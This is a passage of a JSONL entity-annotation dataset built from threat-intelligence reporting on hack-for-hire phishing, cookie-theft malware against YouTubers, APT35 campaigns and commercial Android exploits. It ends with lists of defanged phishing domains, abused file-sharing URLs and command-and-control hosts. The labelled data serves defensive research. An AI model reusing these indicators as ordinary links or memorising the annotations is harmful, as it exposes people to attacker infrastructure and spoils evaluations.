attacker’s public website (no longer available) advertising account hacking capabilities for email and social media services.","entities":[{"id":50843,"label":"identity","start_offset":32,"end_offset":35}],"relations":[],"Comments":[]} {"id":4862,"text":"The site claimed to have received positive reviews on Russian underground forums such as Dublikat and Probiv.cc.","entities":[{"id":50845,"label":"DOMAIN","start_offset":102,"end_offset":111},{"id":50844,"label":"location","start_offset":54,"end_offset":61}],"relations":[],"Comments":[]} {"id":4863,"text":"Over the past five years, TAG has observed the group targeting accounts at major webmail providers like Gmail, Hotmail, and Yahoo! and regional webmail providers like abv.bg, mail.ru, inbox.lv, and UKR.net.","entities":[{"id":50846,"label":"identity","start_offset":26,"end_offset":29},{"id":50847,"label":"SOFTWARE","start_offset":104,"end_offset":109},{"id":50849,"label":"SOFTWARE","start_offset":124,"end_offset":130},{"id":50848,"label":"SOFTWARE","start_offset":111,"end_offset":118},{"id":50850,"label":"SOFTWARE","start_offset":167,"end_offset":173},{"id":50851,"label":"SOFTWARE","start_offset":175,"end_offset":182},{"id":50852,"label":"SOFTWARE","start_offset":184,"end_offset":192},{"id":50853,"label":"SOFTWARE","start_offset":198,"end_offset":205}],"relations":[],"Comments":[]} {"id":4864,"text":"United Arab Emirates TAG is also tracking a hack-for-hire group now based in the United Arab Emirates that is mostly active in the Middle East and North Africa.","entities":[{"id":50856,"label":"location","start_offset":131,"end_offset":142},{"id":50857,"label":"location","start_offset":147,"end_offset":159},{"id":50854,"label":"identity","start_offset":0,"end_offset":24},{"id":50855,"label":"location","start_offset":81,"end_offset":101}],"relations":[],"Comments":[]} {"id":4865,"text":"They have primarily targeted government, education, and political organizations including Middle East focused NGOs in Europe and the Palestinian political party Fatah.","entities":[{"id":50860,"label":"location","start_offset":133,"end_offset":144},{"id":50861,"label":"identity","start_offset":161,"end_offset":166},{"id":50858,"label":"location","start_offset":90,"end_offset":101},{"id":50859,"label":"location","start_offset":118,"end_offset":124},{"id":50862,"label":"identity","start_offset":110,"end_offset":114}],"relations":[],"Comments":[]} {"id":4866,"text":"Amnesty International has also reported on their campaigns.","entities":[],"relations":[],"Comments":[]} {"id":4867,"text":"The group commonly uses Google or OWA password reset lures to steal credentials from targets, often using the MailJet or SendGrid API to send phishing emails.","entities":[{"id":50863,"label":"SOFTWARE","start_offset":24,"end_offset":30},{"id":50864,"label":"SOFTWARE","start_offset":34,"end_offset":37},{"id":50865,"label":"attack-pattern","start_offset":38,"end_offset":92},{"id":50866,"label":"SOFTWARE","start_offset":110,"end_offset":117},{"id":50867,"label":"SOFTWARE","start_offset":121,"end_offset":129}],"relations":[],"Comments":[]} {"id":4868,"text":"Unlike many hack-for-hire actors that use open source phishing frameworks like Evilginx or GoPhish, this group uses a custom phishing kit that utilizes Selenium, a self described 'suite of tools for automating web browsers.'","entities":[{"id":50868,"label":"tools","start_offset":79,"end_offset":87},{"id":50869,"label":"tools","start_offset":91,"end_offset":98},{"id":50870,"label":"tools","start_offset":152,"end_offset":160}],"relations":[],"Comments":[]} {"id":4869,"text":"Previously described by Amnesty, this phishing kit has remained under active development over the past five years.","entities":[{"id":50871,"label":"identity","start_offset":24,"end_offset":31}],"relations":[],"Comments":[]} {"id":4870,"text":"After compromising an account, the actor maintains persistence by granting themselves an OAuth token to a legitimate email app like Thunderbird, or by linking the victim Gmail account to an attacker-owned account on a third-party mail provider.","entities":[{"id":50872,"label":"SOFTWARE","start_offset":132,"end_offset":143},{"id":50873,"label":"SOFTWARE","start_offset":170,"end_offset":175}],"relations":[],"Comments":[]} {"id":4871,"text":"The attacker would then use a custom tool to download the mailbox contents via IMAP.","entities":[],"relations":[],"Comments":[]} {"id":4872,"text":"This group also has links to the original developers of H-Worm, also known as njRAT.","entities":[{"id":50874,"label":"malware","start_offset":56,"end_offset":62},{"id":14895,"label":"malware","start_offset":78,"end_offset":83}],"relations":[{"id":1028,"from_id":14895,"to_id":50874,"type":"duplicate-of"}],"Comments":[]} {"id":4873,"text":"In 2014, Microsoft filed a civil suit against the developer, Mohammed Benabdellah, for the development and dissemination of H-Worm.","entities":[{"id":50875,"label":"TIME","start_offset":3,"end_offset":7},{"id":50877,"label":"identity","start_offset":61,"end_offset":81},{"id":50878,"label":"malware","start_offset":124,"end_offset":130},{"id":50876,"label":"identity","start_offset":9,"end_offset":18}],"relations":[{"id":1029,"from_id":50878,"to_id":50877,"type":"authored-by"}],"Comments":[]} {"id":4874,"text":"Benabdellah, who also goes by the moniker Houdini, has been actively involved in the day-to-day development and operational deployment of the credential phishing capabilities used by this group since its inception.","entities":[{"id":50881,"label":"attack-pattern","start_offset":142,"end_offset":161},{"id":50879,"label":"identity","start_offset":0,"end_offset":11},{"id":50880,"label":"identity","start_offset":42,"end_offset":49}],"relations":[{"id":1030,"from_id":50880,"to_id":50879,"type":"duplicate-of"}],"Comments":[]} {"id":4875,"text":"As part of our efforts to combat serious threat actors, we use results of our research to improve the safety and security of our products.","entities":[],"relations":[],"Comments":[]} {"id":4876,"text":"Upon discovery, all identified websites and domains were added to Safe Browsing to protect users from further harm.","entities":[{"id":50882,"label":"SOFTWARE","start_offset":66,"end_offset":79}],"relations":[],"Comments":[]} {"id":4877,"text":"We encourage any high risk user to enable Advanced Protection and Google Account Level Enhanced Safe Browsing and ensure that all devices are updated.","entities":[{"id":50883,"label":"SOFTWARE","start_offset":66,"end_offset":109},{"id":50884,"label":"SOFTWARE","start_offset":42,"end_offset":61}],"relations":[],"Comments":[]} {"id":4878,"text":"Additionally, our CyberCrime Investigation Group is sharing relevant details and indicators with law enforcement.","entities":[{"id":50885,"label":"identity","start_offset":18,"end_offset":48}],"relations":[],"Comments":[]} {"id":4879,"text":"TAG is committed to sharing our findings as a way of raising awareness with the security community, and with companies and individuals that might have been targeted.","entities":[{"id":50886,"label":"identity","start_offset":0,"end_offset":3}],"relations":[],"Comments":[]} {"id":4880,"text":"We hope that improved understanding of the tactics and techniques will enhance threat hunting capability and lead to stronger user protections across the industry.","entities":[],"relations":[],"Comments":[]} {"id":4881,"text":" With contributions from Winnona DeSombre UAE hack-for-hire Group Domains: Indian hack-for-hire Group Domains: Russian hack-for-hire Group Domains:","entities":[{"id":50889,"label":"location","start_offset":75,"end_offset":81},{"id":50888,"label":"location","start_offset":42,"end_offset":45},{"id":50890,"label":"location","start_offset":111,"end_offset":118},{"id":50887,"label":"identity","start_offset":25,"end_offset":41}],"relations":[],"Comments":[]} {"id":4882,"text":"Google’s Threat Analysis Group tracks actors involved in disinformation campaigns, government backed hacking, and financially motivated abuse.","entities":[{"id":50891,"label":"identity","start_offset":0,"end_offset":30}],"relations":[],"Comments":[]} {"id":4883,"text":"Since late 2019, our team has disrupted financially motivated phishing campaigns targeting YouTubers with Cookie Theft malware.","entities":[{"id":50892,"label":"TIME","start_offset":11,"end_offset":15},{"id":50893,"label":"attack-pattern","start_offset":62,"end_offset":70}],"relations":[],"Comments":[]} {"id":4884,"text":"The actors behind this campaign, which we attribute to a group of hackers recruited in a Russian-speaking forum, lure their target with fake collaboration opportunities (typically a demo for anti-virus software, VPN, music players, photo editing or online games), hijack their channel, then either sell it to the highest bidder or use it to broadcast cryptocurrency scams.","entities":[],"relations":[],"Comments":[]} {"id":4885,"text":"In collaboration with YouTube, Gmail, Trust & Safety, CyberCrime Investigation Group and Safe Browsing teams, our protections have decreased the volume of related phishing emails on Gmail by 99.6% since May 2021.","entities":[{"id":50896,"label":"identity","start_offset":38,"end_offset":52},{"id":50897,"label":"identity","start_offset":54,"end_offset":84},{"id":50898,"label":"identity","start_offset":89,"end_offset":108},{"id":50894,"label":"identity","start_offset":22,"end_offset":29},{"id":50899,"label":"SOFTWARE","start_offset":182,"end_offset":187},{"id":50895,"label":"identity","start_offset":31,"end_offset":36},{"id":50900,"label":"TIME","start_offset":203,"end_offset":211}],"relations":[],"Comments":[]} {"id":4886,"text":"We blocked 1.6M messages to targets, displayed ~62K Safe Browsing phishing page warnings, blocked 2.4K files, and successfully restored ~4K accounts.","entities":[],"relations":[],"Comments":[]} {"id":4887,"text":"With increased detection efforts, we’ve observed attackers shifting away from Gmail to other email providers (mostly email.cz, seznam.cz, post.cz and aol.com).","entities":[{"id":50905,"label":"identity","start_offset":150,"end_offset":157},{"id":50901,"label":"SOFTWARE","start_offset":78,"end_offset":83},{"id":50903,"label":"identity","start_offset":127,"end_offset":136},{"id":50902,"label":"identity","start_offset":117,"end_offset":125},{"id":50904,"label":"identity","start_offset":138,"end_offset":145}],"relations":[],"Comments":[]} {"id":4888,"text":"Moreover, to protect our users, we have referred the below activity to the FBI for further investigation.","entities":[{"id":50906,"label":"identity","start_offset":75,"end_offset":78}],"relations":[],"Comments":[]} {"id":4889,"text":"In this blog, we share examples of the specific tactics, techniques and procedures (TTPs) used to lure victims, as well as some guidance on how users can further protect themselves.","entities":[],"relations":[],"Comments":[]} {"id":4890,"text":"Cookie Theft, also known as “pass-the-cookie attack,” is a session hijacking technique that enables access to user accounts with session cookies stored in the browser.","entities":[{"id":50907,"label":"attack-pattern","start_offset":0,"end_offset":12},{"id":50908,"label":"attack-pattern","start_offset":29,"end_offset":51},{"id":14981,"label":"attack-pattern","start_offset":59,"end_offset":76}],"relations":[],"Comments":[]} {"id":4891,"text":"While the technique has been around for decades, its resurgence as a top security risk could be due to a wider adoption of multi-factor authentication (MFA) making it difficult to conduct abuse, and shifting attacker focus to social engineering tactics.","entities":[{"id":50909,"label":"attack-pattern","start_offset":226,"end_offset":244}],"relations":[],"Comments":[]} {"id":4892,"text":" Many YouTube creators provide an email address on their channel for business opportunities.","entities":[],"relations":[],"Comments":[]} {"id":4893,"text":"In this case, the attackers sent forged business emails impersonating an existing company requesting a video advertisement collaboration.","entities":[],"relations":[],"Comments":[]} {"id":4894,"text":"The phishing typically started with a customized email introducing the company and its products.","entities":[{"id":50910,"label":"attack-pattern","start_offset":4,"end_offset":12}],"relations":[],"Comments":[]} {"id":4895,"text":"Once the target agreed to the deal, a malware landing page disguised as a software download URL was sent via email or a PDF on Google Drive, and in a few cases, Google documents containing the phishing links.","entities":[{"id":50911,"label":"SOFTWARE","start_offset":127,"end_offset":139}],"relations":[],"Comments":[]} {"id":4896,"text":"Around 15,000 actor accounts were identified, most of which were created for this campaign specifically.","entities":[],"relations":[],"Comments":[]} {"id":4897,"text":" The attackers registered various domains associated with forged companies and built multiple websites for malware delivery.","entities":[],"relations":[],"Comments":[]} {"id":4898,"text":"To date, we’ve identified at least 1,011 domains created solely for this purpose.","entities":[],"relations":[],"Comments":[]} {"id":4899,"text":"Some of the websites impersonated legitimate software sites, such as Luminar, Cisco VPN, games on Steam, and some were generated using online templates.","entities":[{"id":50914,"label":"SOFTWARE","start_offset":78,"end_offset":87},{"id":50915,"label":"SOFTWARE","start_offset":89,"end_offset":103},{"id":50913,"label":"SOFTWARE","start_offset":69,"end_offset":76}],"relations":[],"Comments":[]} {"id":4900,"text":"During the pandemic, we also uncovered attackers posing as news providers with a “Covid19 news software.”","entities":[],"relations":[],"Comments":[]} {"id":4901,"text":"In one case, we observed a fake social media page copying content from an existing software company.","entities":[],"relations":[],"Comments":[]} {"id":4902,"text":"The following screenshot is an example of a fake page where the original URL is replaced with one leading to a cookie theft malware download.","entities":[],"relations":[],"Comments":[]} {"id":4903,"text":"Because Google actively detects and disrupts phishing links sent via Gmail, the actors were observed driving targets to messaging apps like WhatsApp, Telegram or Discord.","entities":[{"id":50917,"label":"attack-pattern","start_offset":45,"end_offset":53},{"id":50918,"label":"SOFTWARE","start_offset":69,"end_offset":74},{"id":50919,"label":"SOFTWARE","start_offset":140,"end_offset":148},{"id":50920,"label":"SOFTWARE","start_offset":150,"end_offset":158},{"id":50921,"label":"SOFTWARE","start_offset":162,"end_offset":169},{"id":50916,"label":"identity","start_offset":8,"end_offset":14}],"relations":[],"Comments":[]} {"id":4904,"text":" Once the target runs the fake software, a cookie stealing malware executes, taking browser cookies from the victim’s machine and uploading them to the actor's command & control servers.","entities":[],"relations":[],"Comments":[]} {"id":4905,"text":"Although this type of malware can be configured to be persistent on the victim's machine, these actors are running all malware in non-persistent mode as a smash-and-grab technique.","entities":[],"relations":[],"Comments":[]} {"id":4906,"text":"This is because if the malicious file is not detected when executed, there are less artifacts on an infected host and therefore security products fail to notify the user of a past compromise.","entities":[],"relations":[],"Comments":[]} {"id":4907,"text":"We have observed that actors use various types of malware based on personal preference, most of which are easily available on Github.","entities":[{"id":50922,"label":"SOFTWARE","start_offset":126,"end_offset":132}],"relations":[],"Comments":[]} {"id":4908,"text":"Some commodity malware used included RedLine, Vidar, Predator The Thief, Nexus stealer, Azorult, Raccoon, Grand Stealer, Vikro Stealer, Masad (Google’s naming), and Kantal (Google’s naming) which shares code similarity with Vidar.","entities":[{"id":50930,"label":"malware","start_offset":106,"end_offset":119},{"id":50931,"label":"malware","start_offset":121,"end_offset":134},{"id":50925,"label":"malware","start_offset":53,"end_offset":71},{"id":50926,"label":"malware","start_offset":73,"end_offset":86},{"id":50927,"label":"malware","start_offset":88,"end_offset":95},{"id":50928,"label":"malware","start_offset":97,"end_offset":104},{"id":50932,"label":"malware","start_offset":136,"end_offset":141},{"id":50933,"label":"malware","start_offset":165,"end_offset":171},{"id":50934,"label":"malware","start_offset":224,"end_offset":229},{"id":50923,"label":"malware","start_offset":37,"end_offset":44},{"id":50924,"label":"malware","start_offset":46,"end_offset":51}],"relations":[{"id":1032,"from_id":50933,"to_id":50934,"type":"variant-of"}],"Comments":[]} {"id":4909,"text":"Open source malware like Sorano and AdamantiumThief were also observed.","entities":[{"id":50935,"label":"malware","start_offset":25,"end_offset":31},{"id":50936,"label":"malware","start_offset":36,"end_offset":51}],"relations":[],"Comments":[]} {"id":4910,"text":"Related hashes are listed in the Technical Details section, at the end of this report.","entities":[],"relations":[],"Comments":[]} {"id":4911,"text":"Most of the observed malware was capable of stealing both user passwords and cookies.","entities":[],"relations":[],"Comments":[]} {"id":4912,"text":"Some of the samples employed several anti-sandboxing techniques including enlarged files, encrypted archive and download IP cloaking.","entities":[],"relations":[],"Comments":[]} {"id":4913,"text":"A few were observed displaying a fake error message requiring user click-through to continue execution.","entities":[],"relations":[],"Comments":[]} {"id":4914,"text":" A large number of hijacked channels were rebranded for cryptocurrency scam live-streaming.","entities":[],"relations":[],"Comments":[]} {"id":4915,"text":"The channel name, profile picture and content were all replaced with cryptocurrency branding to impersonate large tech or cryptocurrency exchange firms.","entities":[],"relations":[],"Comments":[]} {"id":4916,"text":"The attacker live-streamed videos promising cryptocurrency giveaways in exchange for an initial contribution.","entities":[],"relations":[],"Comments":[]} {"id":4917,"text":"On account-trading markets, hijacked channels ranged from $3 USD to $4,000 USD depending on the number of subscribers.","entities":[],"relations":[],"Comments":[]} {"id":4918,"text":" These campaigns were carried out by a number of hack-for-hire actors recruited on Russian-speaking forums via the following job description, offering two types of work: This recruitment model explains the highly customized social engineering, as well as the varied malware types given each actor's choice of preferred malware.","entities":[],"relations":[],"Comments":[]} {"id":4919,"text":" We are continuously improving our detection methods and investing in new tools and features that automatically identify and stop threats like this one.","entities":[],"relations":[],"Comments":[]} {"id":4920,"text":"Some of these improvements include: It is also important that users remain aware of these types of threats and take appropriate action to further protect themselves.","entities":[],"relations":[],"Comments":[]} {"id":4921,"text":"Our recommendations: Additional resources: Avoid & Report Phishing Emails.","entities":[],"relations":[],"Comments":[]} {"id":4922,"text":"Related Malware hashes: Top Phishing Domains:","entities":[],"relations":[],"Comments":[]} {"id":4923,"text":"Google’s Threat Analysis Group tracks actors involved in disinformation campaigns, government backed hacking, and financially motivated abuse.","entities":[{"id":50937,"label":"identity","start_offset":0,"end_offset":30}],"relations":[],"Comments":[]} {"id":4924,"text":"We have a long-standing policy to send you a warning if we detect that your account is a target of government-backed phishing or malware attempts.","entities":[{"id":50938,"label":"attack-pattern","start_offset":117,"end_offset":125}],"relations":[],"Comments":[]} {"id":4925,"text":"So far in 2021, we’ve sent over 50,000 warnings, a nearly 33% increase from this time in 2020.","entities":[{"id":50939,"label":"TIME","start_offset":10,"end_offset":14},{"id":50940,"label":"TIME","start_offset":89,"end_offset":93}],"relations":[],"Comments":[]} {"id":4926,"text":"This spike is largely due to blocking an unusually large campaign from a Russian actor known as APT28 or Fancy Bear.","entities":[{"id":50942,"label":"threat-actor","start_offset":96,"end_offset":101},{"id":50943,"label":"threat-actor","start_offset":105,"end_offset":115},{"id":50941,"label":"location","start_offset":73,"end_offset":80}],"relations":[],"Comments":[]} {"id":4927,"text":"We intentionally send these warnings in batches to all users who may be at risk, rather than at the moment we detect the threat itself, so that attackers cannot track our defense strategies.","entities":[],"relations":[],"Comments":[]} {"id":4928,"text":"On any given day, TAG is tracking more than 270 targeted or government-backed attacker groups from more than 50 countries.","entities":[{"id":50944,"label":"identity","start_offset":18,"end_offset":21}],"relations":[],"Comments":[]} {"id":4929,"text":"This means that there is typically more than one threat actor behind the warnings.","entities":[],"relations":[],"Comments":[]} {"id":4930,"text":"In this blog, we explore some of the most notable campaigns we’ve disrupted this year from a different government-backed attacker: APT35, an Iranian group, which regularly conducts phishing campaigns targeting high risk users.","entities":[{"id":50945,"label":"threat-actor","start_offset":131,"end_offset":136},{"id":50947,"label":"location","start_offset":141,"end_offset":148}],"relations":[{"id":1033,"from_id":50945,"to_id":50947,"type":"located-at"}],"Comments":[]} {"id":4931,"text":"This is the one of the groups we disrupted during the 2020 US election cycle for its targeting of campaign staffers.","entities":[{"id":50948,"label":"TIME","start_offset":54,"end_offset":58}],"relations":[],"Comments":[]} {"id":4932,"text":"For years, this group has hijacked accounts, deployed malware, and used novel techniques to conduct espionage aligned with the interests of the Iranian government.","entities":[{"id":50949,"label":"identity","start_offset":144,"end_offset":162}],"relations":[],"Comments":[]} {"id":4933,"text":"In early 2021, APT35 compromised a website affiliated with a UK university to host a phishing kit.","entities":[{"id":50951,"label":"threat-actor","start_offset":15,"end_offset":20},{"id":50950,"label":"TIME","start_offset":3,"end_offset":13}],"relations":[],"Comments":[]} {"id":4934,"text":"Attackers sent email messages with links to this website to harvest credentials for platforms such as Gmail, Hotmail, and Yahoo.","entities":[{"id":50954,"label":"SOFTWARE","start_offset":122,"end_offset":127},{"id":50952,"label":"SOFTWARE","start_offset":102,"end_offset":107},{"id":50953,"label":"SOFTWARE","start_offset":109,"end_offset":116}],"relations":[],"Comments":[]} {"id":4935,"text":"Users were instructed to activate an invitation to a (fake) webinar by logging in.","entities":[],"relations":[],"Comments":[]} {"id":4936,"text":"The phishing kit will also ask for second-factor authentication codes sent to devices.","entities":[],"relations":[],"Comments":[]} {"id":4937,"text":"APT35 has relied on this technique since 2017 — targeting high-value accounts in government, academia, journalism, NGOs, foreign policy, and national security.","entities":[{"id":50955,"label":"threat-actor","start_offset":0,"end_offset":5},{"id":50956,"label":"TIME","start_offset":41,"end_offset":45}],"relations":[],"Comments":[]} {"id":4938,"text":"Credential phishing through a compromised website demonstrates these attackers will go to great lengths to appear legitimate – as they know it's difficult for users to detect this kind of attack.","entities":[{"id":50957,"label":"attack-pattern","start_offset":0,"end_offset":19}],"relations":[],"Comments":[]} {"id":4939,"text":"In May 2020, we discovered that APT35 attempted to upload spyware to the Google Play Store.","entities":[{"id":50958,"label":"TIME","start_offset":3,"end_offset":11},{"id":50959,"label":"threat-actor","start_offset":32,"end_offset":37},{"id":50960,"label":"SOFTWARE","start_offset":73,"end_offset":90}],"relations":[],"Comments":[]} {"id":4940,"text":"The app was disguised as VPN software that, if installed, could steal sensitive information such as call logs, text messages, contacts, and location data from devices.","entities":[],"relations":[],"Comments":[]} {"id":4941,"text":"Google detected the app quickly and removed it from the Play Store before any users had a chance to install it.","entities":[{"id":50961,"label":"identity","start_offset":0,"end_offset":6},{"id":50962,"label":"SOFTWARE","start_offset":56,"end_offset":66}],"relations":[],"Comments":[]} {"id":4942,"text":"Although Play Store users were protected, we are highlighting the app here as TAG has seen APT35 attempt to distribute this spyware on other platforms as recently as July 2021.","entities":[{"id":50964,"label":"identity","start_offset":78,"end_offset":81},{"id":50965,"label":"threat-actor","start_offset":91,"end_offset":96},{"id":50966,"label":"TIME","start_offset":166,"end_offset":175},{"id":50963,"label":"SOFTWARE","start_offset":9,"end_offset":19}],"relations":[],"Comments":[]} {"id":4943,"text":"One of the most notable characteristics of APT35 is their impersonation of conference officials to conduct phishing attacks.","entities":[{"id":50967,"label":"threat-actor","start_offset":43,"end_offset":48},{"id":50968,"label":"attack-pattern","start_offset":107,"end_offset":115}],"relations":[],"Comments":[]} {"id":4944,"text":"Attackers used the Munich Security and the Think-20 (T20) Italy conferences as lures in non-malicious first contact email messages to get users to respond.","entities":[],"relations":[],"Comments":[]} {"id":4945,"text":"When they did, attackers sent them phishing links in follow-on correspondence.","entities":[{"id":50970,"label":"attack-pattern","start_offset":35,"end_offset":49}],"relations":[],"Comments":[]} {"id":4946,"text":"Targets typically had to navigate through at least one redirect before landing on a phishing domain.","entities":[],"relations":[],"Comments":[]} {"id":4947,"text":"Link shorteners and click trackers are heavily used for this purpose, and are oftentimes embedded within PDF files.","entities":[],"relations":[],"Comments":[]} {"id":4948,"text":"We’ve disrupted attacks using Google Drive, App Scripts, and Sites pages in these campaigns as APT35 tries to get around our defenses.","entities":[{"id":50972,"label":"threat-actor","start_offset":95,"end_offset":100},{"id":50971,"label":"SOFTWARE","start_offset":30,"end_offset":42}],"relations":[],"Comments":[]} {"id":4949,"text":"Services from Dropbox and Microsoft are also abused.","entities":[{"id":50974,"label":"identity","start_offset":26,"end_offset":35},{"id":50973,"label":"identity","start_offset":14,"end_offset":21}],"relations":[],"Comments":[]} {"id":4950,"text":"One of APT35’s novel techniques involves using Telegram for operator notifications.","entities":[{"id":50975,"label":"threat-actor","start_offset":7,"end_offset":12},{"id":50976,"label":"SOFTWARE","start_offset":47,"end_offset":55}],"relations":[],"Comments":[]} {"id":4951,"text":"The attackers embed javascript into phishing pages that notify them when the page has been loaded.","entities":[],"relations":[],"Comments":[]} {"id":4952,"text":"To send the notification, they use the Telegram API sendMessage function, which lets anyone use a Telegram bot to send a message to a public channel.","entities":[{"id":50977,"label":"SOFTWARE","start_offset":39,"end_offset":47},{"id":50978,"label":"SOFTWARE","start_offset":98,"end_offset":106}],"relations":[],"Comments":[]} {"id":4953,"text":"The attackers use this function to relay device-based data to the channel, so they can see details such as the IP, useragent, and locales of visitors to their phishing sites in real-time.","entities":[],"relations":[],"Comments":[]} {"id":4954,"text":"We reported the bot to Telegram and they have taken action to remove it.","entities":[{"id":50979,"label":"SOFTWARE","start_offset":23,"end_offset":31}],"relations":[],"Comments":[]} {"id":4955,"text":"We warn users when we suspect a government-backed threat like APT35 is targeting them.","entities":[{"id":50980,"label":"threat-actor","start_offset":62,"end_offset":67}],"relations":[],"Comments":[]} {"id":4956,"text":"Thousands of these warnings are sent every month, even in cases where the corresponding attack is blocked.","entities":[],"relations":[],"Comments":[]} {"id":4957,"text":"If you receive a warning it does not mean your account has been compromised, it means you have been identified as a target.","entities":[],"relations":[],"Comments":[]} {"id":4958,"text":"Workspace administrators are also notified regarding targeted accounts in their domain.","entities":[],"relations":[],"Comments":[]} {"id":4959,"text":"Users are encouraged to take these warnings seriously and consider enrolling in the Advanced Protection Program or enabling two-factor authentication if they haven't already.","entities":[],"relations":[],"Comments":[]} {"id":4960,"text":"We also block malicious domains using Google Safe Browsing – a service that Google's security team built to identify unsafe websites across the web and notify users and website owners of potential harm.","entities":[{"id":50982,"label":"identity","start_offset":76,"end_offset":98},{"id":50981,"label":"SOFTWARE","start_offset":38,"end_offset":58}],"relations":[],"Comments":[]} {"id":4961,"text":"When a user of a Safe Browsing-enabled browser or app attempts to access unsafe content on the web, they’ll see a warning page explaining that the content they’re trying to access may be harmful.","entities":[{"id":50983,"label":"SOFTWARE","start_offset":17,"end_offset":30}],"relations":[],"Comments":[]} {"id":4962,"text":"When a site identified by Safe Browsing as harmful appears in Google Search results, we show a warning next to it in the results.","entities":[{"id":50984,"label":"SOFTWARE","start_offset":62,"end_offset":75},{"id":50985,"label":"SOFTWARE","start_offset":26,"end_offset":39}],"relations":[],"Comments":[]} {"id":4963,"text":"Threat Analysis Group will continue to identify bad actors and share relevant information with others in the industry, with the goal of bringing awareness to these issues, protecting you and fighting bad actors to prevent future attacks.","entities":[{"id":50986,"label":"identity","start_offset":0,"end_offset":21}],"relations":[],"Comments":[]} {"id":4964,"text":"Indicators from APT28 phishing campaign: service-reset-password-moderate-digital.rf[.]gd reset-service-identity-mail.42web[.]io digital-email-software.great-site[.]net Indicators from APT35 campaigns: Abused Google Properties: https:\/\/sites.google[.]com\/view\/ty85yt8tg8-download-rtih4ithr\/ https:\/\/sites.google[.]com\/view\/user-id-568245\/ https:\/\/sites.google[.]com\/view\/hhbejfdwdhwuhscbsb-xscvhdvbc\/ Abused Dropbox Properties: https:\/\/www.dropbox[.]com\/s\/68y4vpfu8pc3imf\/Iraq&Jewish.pdf Phishing Domains: nco2[.]live summit-files[.]com filetransfer[.]club continuetogo[.]me accessverification[.]online customers-verification-identifier[.]site service-activity-session[.]online identifier-service-review[.]site recovery-activity-identification[.]site review-session-confirmation[.]site recovery-service-activity[.]site verify-service-activity[.]site service-manager-notifications[.]info ","entities":[{"id":50995,"label":"URL","start_offset":430,"end_offset":489},{"id":50987,"label":"threat-actor","start_offset":16,"end_offset":21},{"id":50988,"label":"DOMAIN","start_offset":42,"end_offset":88},{"id":50989,"label":"DOMAIN","start_offset":89,"end_offset":127},{"id":50990,"label":"DOMAIN","start_offset":128,"end_offset":167},{"id":50993,"label":"URL","start_offset":292,"end_offset":339},{"id":50994,"label":"URL","start_offset":340,"end_offset":401},{"id":50996,"label":"DOMAIN","start_offset":509,"end_offset":520},{"id":50997,"label":"DOMAIN","start_offset":521,"end_offset":539},{"id":51001,"label":"DOMAIN","start_offset":606,"end_offset":646},{"id":51002,"label":"DOMAIN","start_offset":647,"end_offset":680},{"id":51003,"label":"DOMAIN","start_offset":681,"end_offset":713},{"id":51004,"label":"DOMAIN","start_offset":714,"end_offset":753},{"id":51005,"label":"DOMAIN","start_offset":754,"end_offset":788},{"id":51006,"label":"DOMAIN","start_offset":789,"end_offset":821},{"id":51007,"label":"DOMAIN","start_offset":822,"end_offset":852},{"id":51008,"label":"DOMAIN","start_offset":853,"end_offset":889},{"id":50991,"label":"threat-actor","start_offset":185,"end_offset":190},{"id":50992,"label":"URL","start_offset":229,"end_offset":290},{"id":50998,"label":"DOMAIN","start_offset":540,"end_offset":559},{"id":50999,"label":"DOMAIN","start_offset":560,"end_offset":577},{"id":51000,"label":"DOMAIN","start_offset":578,"end_offset":605}],"relations":[],"Comments":[]} {"id":4965,"text":"Android App: https:\/\/www.virustotal.com\/gui\/file\/5d3ff202f20af915863eee45916412a271bae1ea3a0e20988309c16723ce4da5\/detection Android App C2: communication-shield[.]site cdsa[.]xyz","entities":[{"id":51009,"label":"DOMAIN","start_offset":141,"end_offset":168},{"id":51010,"label":"DOMAIN","start_offset":169,"end_offset":179},{"id":15245,"label":"URL","start_offset":13,"end_offset":123}],"relations":[],"Comments":[]} {"id":4966,"text":"To protect our users, Google’s Threat Analysis Group (TAG) routinely hunts for 0-day vulnerabilities exploited in-the-wild.","entities":[{"id":51011,"label":"identity","start_offset":22,"end_offset":58}],"relations":[],"Comments":[]} {"id":4967,"text":"In 2021, we reported nine 0-days affecting Chrome, Android, Apple and Microsoft, leading to patches to protect users from these attacks.","entities":[{"id":51013,"label":"SOFTWARE","start_offset":43,"end_offset":49},{"id":51016,"label":"identity","start_offset":70,"end_offset":79},{"id":51015,"label":"identity","start_offset":60,"end_offset":65},{"id":51012,"label":"TIME","start_offset":3,"end_offset":7},{"id":51014,"label":"SOFTWARE","start_offset":51,"end_offset":58}],"relations":[],"Comments":[]} {"id":4968,"text":"This blog is a follow up to our July 2021 post on four 0-day vulnerabilities we discovered in 2021, and details campaigns targeting Android users with five distinct 0-day vulnerabilities: We assess with high confidence that these exploits were packaged by a single commercial surveillance company, Cytrox, and sold to different government-backed actors who used them in at least the three campaigns discussed below.","entities":[{"id":51020,"label":"threat-actor","start_offset":298,"end_offset":304},{"id":51017,"label":"TIME","start_offset":32,"end_offset":41},{"id":51019,"label":"SOFTWARE","start_offset":132,"end_offset":139},{"id":51018,"label":"TIME","start_offset":94,"end_offset":98}],"relations":[],"Comments":[]} {"id":4969,"text":"Consistent with findings from CitizenLab, we assess likely government-backed actors purchasing these exploits are operating (at least) in Egypt, Armenia, Greece, Madagascar, Côte d’Ivoire, Serbia, Spain and Indonesia.","entities":[{"id":51025,"label":"location","start_offset":162,"end_offset":173},{"id":51026,"label":"location","start_offset":174,"end_offset":187},{"id":51027,"label":"location","start_offset":189,"end_offset":195},{"id":51029,"label":"location","start_offset":207,"end_offset":216},{"id":51021,"label":"identity","start_offset":30,"end_offset":40},{"id":51023,"label":"location","start_offset":145,"end_offset":152},{"id":51028,"label":"location","start_offset":197,"end_offset":202},{"id":51024,"label":"location","start_offset":154,"end_offset":160},{"id":51022,"label":"location","start_offset":138,"end_offset":143}],"relations":[],"Comments":[]} {"id":4970,"text":"The 0-day exploits were used alongside n-day exploits as the developers took advantage of the time difference between when some critical bugs were patched but not flagged as security issues and when these patches were fully deployed across the Android ecosystem.","entities":[{"id":51030,"label":"SOFTWARE","start_offset":244,"end_offset":251}],"relations":[],"Comments":[]} {"id":4971,"text":"Our findings underscore the extent to which commercial surveillance vendors have proliferated capabilities historically only used by governments with the technical expertise to develop and operationalize exploits.","entities":[],"relations":[],"Comments":[]} {"id":4972,"text":"Seven of the nine 0-days TAG discovered in 2021 fall into this category: developed by commercial providers and sold to and used by government-backed actors.","entities":[{"id":51031,"label":"identity","start_offset":25,"end_offset":28},{"id":51032,"label":"TIME","start_offset":43,"end_offset":47}],"relations":[],"Comments":[]} 